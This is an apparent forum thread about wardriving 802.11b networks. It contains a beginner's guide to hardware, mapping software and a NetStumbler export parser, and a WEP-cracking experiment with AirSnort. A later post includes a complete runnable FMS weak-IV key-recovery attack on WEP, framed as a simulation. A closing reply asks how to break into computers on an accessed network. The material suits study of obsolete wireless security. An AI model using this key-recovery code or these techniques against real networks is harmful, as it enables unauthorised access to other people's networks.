Full Version: Wardriving 802.11b
charon255
I like to war-drive. I have no want or need to snoop around anyone else's network. In fact I always make sure to unbind my TCP/IP stack when doing so to prevent such a thing from happening inadvertently. No, I do it because I enjoy it and because I can.

It is an amazing evolution to watch unfold, as wireless networks spring up in greater and greater numbers. It is also rather sad to see that many if not most of these networks are not properly secured. A fair number are "wide open" and offer no protection whatsoever. I have personally accumulated a database of more than 3000 wireless access points in my local area alone. Statistically speaking, only about 28% of these WAPs had enabled WEP. Most that I have discovered are residential, and a fair number belong to small, medium, and even a handful of very large corporations.

In advance, I acknowledge that this topic has been covered in much greater depth and in many other places as well. I would simply like to share my experience and observations on the topic in the hope that it may help others who are curious about getting started. The content I will present is aimed towards a beginner, thus, if you have already been wardriving, you may want to skip this one...

Of course, the standard disclaimers and small print apply here: This is educational info only. If you choose to use this information to commit a crime, you are doing so at your own risk. Any damage, either accidental or deliberate, that is caused by the use of this information is YOUR sole responsibility and the author of this article will be held harmless. There is no guarantee that anything contained herein is either accurate or authoritative. You may re-publish this information anytime, anywhere you wish, no need to acknowledge the author, but acknowledgements to the providers of software and hardware discussed would be appropriate. Bottom line: Be respectful, responsible, and above all... be curious.

This will be a multi-part article where I will discuss a few things which may be of interest:

1) My WarDriving Rig (hardware, software, approximate costs, etc.)
2) How-to (including many references to crucial resources)
3) What I have observed
4) What I did to bring "real" security to my home WLAN

==========================================================================
My WarDriving Rig


My wardriving "rig" is neither sophisticated, nor expensive. It consists of the following:


HARDWARE

Laptop: Dell Latitude CPi
Specs: 300 MHz PII, 128 MB RAM, 6.5 GB HDD
OS: Windows 2000 Pro SP4, Various Flavors of Linux Bootable CDs (WarLinux, LAS, Knoppix STD)
Cost: $20.00 at a company surplus sale (you can find these on Ebay all day long for under $300.00)
http://search.ebay.com/search/search.dll?G...recordstoskip=0
Bottom Line: Not exactly a powerhouse machine, but absolutely adequate for WarDriving, and cheap to replace if something bad were to happen to it.

Wireless NIC: Senao SL-2511CD PLUS EXT2 http://www.seattlewireless.net/index.cgi/SenaoCard
Form Factor: PCMCIA Type II PC Card
Supports: 802.11b only, WEP 64/128
Chipset: Prism 2.5
Transmit power: 200 mW (23 dBm), variable from 10 mW to 200 mW
Receive Sensitivity (dBm):
1 Mbps: -95
2 Mbps: -93
5.5 Mbps: -91
11 Mbps: -89
http://freenetworks.org/moin/index.cgi/ReceiveSensitivity
Antenna Options: Dual female mmcx connectors (no antenna included)
Antenna Mode: Diversity
Cost: $99.00 - http://www.jefatech.com/category/e200/
(I purchased this as a bundle with an external antenna http://www.jefatech.com/category/b400/ for $124.95)
Bottom Line: Outstanding, best "b" card I have ever used

Antenna 1: 2.4 GHz 5.5 dBi Magnetic Mount Omnidirectional http://www.jefatech.com/category/antennas.mobile/
Height: 6" including base, nearly un-noticeable
Base: Strong magnet, must be mounted to flat metal surface (such as car roof or trunk) for proper operation
Pigtail: None, came with MMCX connector fitted onto 5 ft coax cable
Cost: $15.00 - $25.00
Bottom Line: Works like a charm, no comparison to "built in" card antenna strength, stays on car at high speeds, picks up APs like crazy

Antenna 2: "Blade" Style Omnidirectional 4.5 dBi http://www.fab-corp.com/index.htm
Dimensions: H:5.7, W:1, D:.1 (inches)
Pigtail: None, bought with 19" coax with MMCX connector
Mount: Cheap velcro strip (wal-mart) on laptop lid and antenna
Cost: $44.99
Bottom Line: Great for general use, super for war-"walking", doesn't have the distance of the mag mount above, but within a few hundred feet it's 100% signal (11 Mbps) all the time

Note: I have not bothered to connect both antennae at the same time. From what I have read, this would not enhance the receive capabilities. The dual antenna jacks on the NIC are mainly to support an antenna diversity setup when the nic is integrated into a wireless access point.

GPS Receiver:
Delorme Earthmate USB http://www.compusa.com/products/product_in...02518&pfp=srch1
Specs: NMEA-compliant 12-channel receiver, WAAS-enabled
Connection: USB. Serial-port emulation drivers are included (worked without any problems) for use with serial-only software like NetStumbler. Doesn't work with Linux yet (no driver support), but a hardware converter is available from Delorme: http://www.delorme.com/earthmate/accessories.asp - Earthmate Serial/Power Cable
Bundled Software: Delorme Street Atlas USA 2004 (nice but not really used)
Size: TINY (H:.81, W:1.88, D:1.1 - inches)
Cost: $129.00
Bottom Line: Works like a champ with NetStumbler, very accurate, sometimes a little slow acquiring sat signal, but for the price, cannot be beat.

Mobile Power 140W DC/AC Inverter 120V
http://www.compusa.com/products/product_in...4107&pfp=SEARCH
Cost: $39.99
Bottom Line: Works fine for powering a laptop and other smaller appliances. If you want to power other items as well, you will need a more powerful unit, perhaps something along these lines:

Mobile Power 350W DC/AC Inverter 120V
http://www.compusa.com/products/product_in...4108&pfp=SEARCH
Cost: $59.99

SOFTWARE

NetStumbler 0.3.30
http://www.netstumbler.com/
Notes: NS can read from the above NIC in both NDIS compatibility mode and Prism mode. I use Prism, since it reports more accurate signal strength stats and seems more sensitive.
Cost: Free

MS MapPoint 2002 (2004 can be used also)
http://www.microsoft.com/mappoint/default.mspx
Notes: This is used to help me plot the discovered access points on a nice map.
Cost: $299 (pretty steep, but you can ask around for someone who isn't using their copy; I saw one on Ebay for around $100.00)

Stumbverter v100 beta5
http://www.michiganwireless.org/tools/Stum...v100_beta_5.zip
Notes: This software takes an exported NetStumbler file, converts the information and then visually plots all your discovered APs on a MapPoint map as pushpin objects. Very nice tool with GPS integration; it creates an excellent representation of APs including such info as signal strength, WEP on/off, SSID, etc. This makes all the difference in the world. Note: Use StumbVerter v1.50 if you are using MapPoint 2004 - http://www.michiganwireless.org/tools/Stum...Verter_V150.zip

Various Linux-based Packages (haven't tried anything to get GPS support in linux so far):
Kismet (works fine with my setup)
AirSnort (works fine with my setup)


Notes on Mapping:

A cheaper (albeit less visually striking) alternative to mapping your APs with MapPoint is to use the bundled Street Atlas 2004 app that came with the GPS, and a tool called WiMap - http://www.honet.com/WiMap/default.htm - FREE - to plot your APs.

Another software package that works with Street Atlas is SA Stumbler - http://home.comcast.net/~jay.deboer/wardri.../SAStumbler.htm - FREE.

Also you can buy MS Streets and Trips for around $30.00 http://www.microsoft.com/streets/default.asp and use StreetStumbler - http://www.michiganwireless.org/tools/Stre...ler204Final.zip - FREE - to plot your NetStumbler output on a MS S&T map (haven't tried this one).

Finally, there are a number of GPS utils from the open source community, GPSDrive comes to mind, but again, not sure if any of this will work with the Delorme GPS unit.

Next Installment: How to put it all together and get out on the road!
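The 28% figure in this post and every mapping tool listed above start from the same thing: NetStumbler's exported summary file. The parser below is an added example, not part of the original post and not NetStumbler or StumbVerter code. Its column order follows the header line NetStumbler 0.4 writes at the top of a "wi-scan with extensions" export (latitude, longitude, SSID, type, BSSID, time, SNR/signal/noise, name, Flags, Channelbits, beacon interval, data rate, last channel); treat that layout as an assumption and check it against your own file. The four data lines are constructed, not real survey data. Flags is the 802.11 capability field, so the Privacy bit (0x0010) is what NetStumbler reports as WEP; the script tallies that, hidden SSIDs and per-channel counts, and writes a plain lat/lon CSV that Street Atlas, MapPoint or any GIS can import as pushpins.

```python
"""Tally WEP use from a NetStumbler "wi-scan with extensions" summary export.
Added example, not NetStumbler or StumbVerter code. The data lines in SAMPLE are
constructed; the column order follows the header NetStumbler 0.4 writes and is
an assumption to check against your own file. Flags is the 802.11 capability
field: 0x0010 (Privacy) is what NetStumbler shows as WEP, 0x0002 means ad hoc.
Channelbits has bit n set for channel n; signal and noise are in dBm."""
import csv
import io
from dataclasses import dataclass

CAP_IBSS, CAP_PRIVACY = 0x0002, 0x0010

SAMPLE = (
    "# $Creator: Network Stumbler Version 0.4.0\n"
    "# $Format: wi-scan with extensions\n"
    "# Latitude\tLongitude\t( SSID )\tType\t( BSSID )\tTime (GMT)\t[ SNR Sig Noise ]\t"
    "# ( Name )\tFlags\tChannelbits\tBcnIntvl\tDataRate\tLastChannel\n"
    "# $DateGMT: 2004-08-16\n"
    "N 42.3600000\tW 71.0600000\t( linksys )\tBBS\t( 00:0c:41:00:00:01 )\t15:04:22 (GMT)\t"
    "[ 28 -72 -100 ]\t# ( )\t0001\t0040\t100\t110\t6\n"
    "N 42.3610000\tW 71.0610000\t( corp-wlan )\tBBS\t( 00:40:96:00:00:02 )\t15:05:10 (GMT)\t"
    "[ 12 -88 -100 ]\t# ( )\t0011\t0800\t100\t110\t11\n"
    "N 42.3620000\tW 71.0620000\t(  )\tBBS\t( 00:06:25:00:00:03 )\t15:06:01 (GMT)\t"
    "[ 35 -65 -100 ]\t# ( )\t0001\t0002\t100\t110\t1\n"
    "N 42.3630000\tW 71.0630000\t( garage )\tBBS\t( 00:90:4b:00:00:04 )\t15:07:30 (GMT)\t"
    "[ 9 -91 -100 ]\t# ( )\t0011\t0040\t100\t110\t6\n"
)

@dataclass
class AccessPoint:
    lat: float
    lon: float
    ssid: str
    bssid: str
    snr: int
    signal: int
    noise: int
    flags: int
    channels: list
    channel: int
    rate_mbps: float

    @property
    def wep(self):
        return bool(self.flags & CAP_PRIVACY)

    @property
    def adhoc(self):
        return bool(self.flags & CAP_IBSS)

def _coord(field):
    """'N 42.36' -> 42.36; 'W 71.06' -> -71.06 (south/west negative)."""
    hemi, value = field.split(" ", 1)
    return float(value) * (-1 if hemi in ("S", "W") else 1)

def _paren(field):
    """'( linksys )' -> 'linksys'; '(  )' -> '' (hidden or empty SSID)."""
    inner = field.strip().lstrip("#").strip()
    return inner[1:-1].strip() if inner[:1] == "(" and inner[-1:] == ")" else inner

def parse_wiscan(text):
    """One AccessPoint per data line; '#' lines are the export's header."""
    aps = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split("\t")
        if len(f) < 13:
            raise ValueError(f"unexpected column count: {line!r}")
        snr, sig, noise = (int(x) for x in f[6].strip("[] ").split())
        bits = int(f[9], 16)
        aps.append(AccessPoint(
            lat=_coord(f[0]), lon=_coord(f[1]), ssid=_paren(f[2]),
            bssid=_paren(f[4]).lower(), snr=snr, signal=sig, noise=noise,
            flags=int(f[8], 16), channels=[n for n in range(1, 15) if bits >> n & 1],
            channel=int(f[12]), rate_mbps=int(f[11]) / 10))
    return aps

def wep_summary(aps):
    """The post's headline numbers: how many logged APs actually run WEP."""
    total, wep = len(aps), sum(ap.wep for ap in aps)
    per_channel = {}
    for ap in aps:
        open_n, wep_n = per_channel.get(ap.channel, (0, 0))
        per_channel[ap.channel] = (open_n + (not ap.wep), wep_n + ap.wep)
    return {"total": total, "wep": wep, "open": total - wep,
            "wep_pct": round(100.0 * wep / total, 1) if total else 0.0,
            "hidden_ssid": sum(ap.ssid == "" for ap in aps),
            "adhoc": sum(ap.adhoc for ap in aps), "per_channel": per_channel}

def to_pushpin_csv(aps):
    """lat/lon rows any mapping program can import as pushpins, WEP flagged."""
    buf = io.StringIO()
    w = csv.writer(buf, lineterminator="\n")
    w.writerow(["lat", "lon", "bssid", "ssid", "channel", "wep", "signal_dbm"])
    for ap in aps:
        w.writerow([ap.lat, ap.lon, ap.bssid, ap.ssid or "<hidden>", ap.channel,
                    "yes" if ap.wep else "no", ap.signal])
    return buf.getvalue()

if __name__ == "__main__":
    aps = parse_wiscan(SAMPLE)
    print(wep_summary(aps))
    print(to_pushpin_csv(aps))
```

Point it at a real export with `parse_wiscan(open("export.txt").read())`; the hidden-SSID count is worth watching separately, since an empty SSID column says nothing about whether WEP is on.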


Mouhahaha
very nice article, looking forward to the second part, you got me interested in this matter a bit more, thanks for posting all the items used and their prices... keep up the good work.
Slippery Monkey
thanks for the article, sounds like fun
Pro21
I tried the wardriving, it's very funny
and a lot of routers are not secure, only some routers have a WEP key
h3llraz0r
good text! great work
Spookie
Nice write-up. There's some additional information located under the General Security Information - War Driving Kit for those interested.
Skydriver
Does anyone try to crack WEP?
freak0201
thanks, i'll have to try this
charon255
The next installment of this article is almost finished, been real busy at work, but soon.

In response to cracking WEP. Again, my opinion, my observations.

My WEP cracking experiment:

Hardware:
AP: Linksys WAP11 with the original firmware
Client: Dell Latitude CPi (Win2k) with a D-Link DWL 650 PCMCIA 802.11b NIC
Attacker: Dell Inspiron 3800 with HDD install of Knoppix STD, Senao 2511 PCMCIA 802.11b NIC

AP Setup:
Changed default SSID, disabled SSID broadcast
Enabled 128-bit WEP, using a 10-character alphanumeric key to generate the WEP key

Client Setup:
Nothing special, just a few CMD prompts open and constantly pinging the AP, as well as a Perl script which calls the HTTP management interface of the AP in an infinite loop (again, to generate as much traffic as possible).

Attacker Setup:
AirSnort locked to the AP channel (6), width set to 3 for 128-bit

Results:
AirSnort ran for 2 weeks and 1 day, 9,000,000+ packets captured. 4200 (I think - don't have my data here) interesting IVs found. Finally cracked the key.

Conclusions:
Yes, WEP is vulnerable. But so are NT passwords if given enough time to brute force them. However, I would have to say that based on my experiment, and word from others I have heard who have gone after WEP keys (esp 128bit), that this is no child's game. Add to this that most new NICs/APs that are coming out do not spew out weak IVs like the older equipment does, I feel that this vector for attack becomes less and less feasible by the day.

You may get lucky and nail it in a few hours, but sitting outside a facility and capturing packets for even as little as a few days would fall into the realm of a truly determined attacker.

SO, the question is... "Is WEP okay for the average home user? "

The answer: probably... The average wardriver, next-door neighbor, etc. is likely not inclined to expend that much effort on cracking into a home network when there are so many other unsecured networks available.

Is WEP okay for the average business? I would not recommend using WEP as the sole means of defense. Even for small businesses, the prices are coming down for added protections such as access gateways, hybrid VPN solutions, and even setting up an open source 802.1X solution is getting easier.

So after reading this you might ask... "So what are YOU doing to protect YOUR home network?" Good question, but you'll have to hang in there for the 4th installment of this series of articles to find out. I think you'll like it...
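The "interesting IVs" AirSnort counted in the experiment above are the FMS weak IVs: for each secret key byte, IVs whose first few RC4 key-scheduling steps leave the state in a "resolved" form, so that the first keystream byte (exposed by the fixed 0xAA LLC/SNAP byte at the start of every data frame) equals a value that reveals the key byte about 5% of the time. Majority voting over enough such IVs recovers one byte, then the next. The simulation below is an added example, neither the author's setup nor AirSnort code. It runs the attack against a constructed 40-bit WEP access point that still emits every IV (the "old equipment" case in the post): it finds resolved IVs per key byte, votes, backtracks into the next-best candidates with a breadth setting like the one mentioned above, and confirms a full candidate key by checking the CRC-32 ICV of one ordinary captured frame. The secret key, the frame bodies and the access point are constructed; scanning the IV's second byte in addition to the classic (A+3, 255, x) class is a generalisation of FMS, not AirSnort's exact IV selection.

```python
"""FMS weak-IV attack on 40-bit WEP, simulated end to end. Added example, not
the post's setup and not AirSnort code. Constructed: the key, the frame bodies
and an AP that encrypts under any IV it is asked for (no weak-IV filtering).
Real WEP is kept: RC4 keyed with IV || secret, CRC-32 ICV, 0xAA first byte."""
import random
import zlib

SNAP0 = 0xAA   # first plaintext byte of every 802.11 data frame (LLC DSAP)

def ksa_prefix(known):
    """Only the first len(known) KSA steps: the IV plus key bytes known so far."""
    S, j = list(range(256)), 0
    for i, k in enumerate(known):
        j = (j + S[i] + k) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_stream(key, length):
    """Full RC4: 256-step KSA, then `length` keystream bytes from the PRGA."""
    S, _ = ksa_prefix([key[i % len(key)] for i in range(256)])
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv, secret, body):
    """WEP: body || CRC-32 ICV (little-endian), XORed with RC4(IV || secret)."""
    plain = body + zlib.crc32(body).to_bytes(4, "little")
    ks = rc4_stream(bytes(iv) + secret, len(plain))
    return bytes(p ^ k for p, k in zip(plain, ks))

def wep_icv_ok(iv, secret, frame):
    """Decrypt under a candidate key and check the ICV (false for a wrong key)."""
    ks = rc4_stream(bytes(iv) + secret, len(frame))
    plain = bytes(c ^ k for c, k in zip(frame, ks))
    return zlib.crc32(plain[:-4]).to_bytes(4, "little") == plain[-4:]

class AccessPoint:
    """Constructed AP: hands out an encrypted ARP-sized frame for any IV."""
    def __init__(self, secret, rng):
        self._secret, self._rng, self.frames = secret, rng, {}

    def frame(self, iv):
        iv = tuple(iv)
        if iv not in self.frames:   # LLC/SNAP header, then a random 28-byte body
            body = bytes([SNAP0, 0xAA, 0x03, 0, 0, 0, 0x08, 0x06])
            body += bytes(self._rng.getrandbits(8) for _ in range(28))
            self.frames[iv] = wep_encrypt(iv, self._secret, body)
        return self.frames[iv]

def resolved_state(iv, prefix, A):
    """FMS 'resolved' test for secret byte A: after A+3 KSA steps, S[1] < A+3 and
    S[1] + S[S[1]] == A+3. Then, ~5% of the time (those cells survive the rest
    of the KSA), keystream byte 0 is the value swapped into S[A+3] at step A+3."""
    S, j = ksa_prefix(list(iv) + prefix)
    p = S[1]
    return (S, j) if p < A + 3 and (p + S[p]) & 0xFF == A + 3 else None

def fms_vote(S, j, A, ks0):
    """Invert KSA step A+3 assuming the 5% case: a candidate for key byte A."""
    return (S.index(ks0) - j - S[A + 3]) & 0xFF

def weak_ivs(prefix, A):
    """Every IV (A+3, b, c) that resolves for byte A; the classic FMS class
    (A+3, 255, x) is a subset, scanning b as well adds further resolved IVs."""
    for b in range(256):
        for c in range(256):
            st = resolved_state((A + 3, b, c), prefix, A)
            if st is not None:
                yield (A + 3, b, c), st

def recover_key(ap, key_len=5, breadth=3):
    """Vote byte by byte; like AirSnort's breadth setting, back-track into the
    next-best candidates when a full key fails the ICV check on a probe frame."""
    probe_iv = (0x10, 0x20, 0x30)              # any ordinary frame off the air
    probe = ap.frame(probe_iv)

    def search(prefix):
        A = len(prefix)
        if A == key_len:
            return prefix if wep_icv_ok(probe_iv, bytes(prefix), probe) else None
        votes = [0] * 256
        for iv, (S, j) in weak_ivs(prefix, A):
            ks0 = ap.frame(iv)[0] ^ SNAP0      # known plaintext -> keystream byte 0
            votes[fms_vote(S, j, A, ks0)] += 1
        for cand in sorted(range(256), key=lambda k: -votes[k])[:breadth]:
            hit = search(prefix + [cand])
            if hit is not None:
                return hit
        return None

    hit = search([])
    return None if hit is None else bytes(hit)

def demo(secret_hex="5b2ac417e9", seed=2004):
    """Attack a constructed AP; returns (true key, recovered key, frames used)."""
    secret = bytes.fromhex(secret_hex)
    ap = AccessPoint(secret, random.Random(seed))
    return secret, recover_key(ap), len(ap.frames)
```

`demo()` returns the true key, the recovered key and how many frames the attacker needed; with a few hundred resolved IVs per byte the top vote is nearly always right and a 40-bit key falls in a second or two. The 128-bit case in the post has eight more bytes to vote on, and only 1 in 65536 IVs seen on the air falls into a given byte's classic class, which is where the two-week capture goes. Firmware that simply never transmits those IV classes removes the votes altogether, matching the observation above about newer equipment.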

qcred11
QUOTE
NetStumbler v0.4 Released

A new version of the popular Windows-based wireless network discovery tool NetStumbler was released today. Updates include support for more wireless cards, IP address reporting, new scripting features, and several bug fixes. This is the first new release since late August of 2002, over a year and a half ago.
tshark
Hey, I was wondering. Say a person is wardriving and gets access to your AP so they can surf the web. Can they also hack into the computers that are also on the wireless network? And if they can, how do they?

- T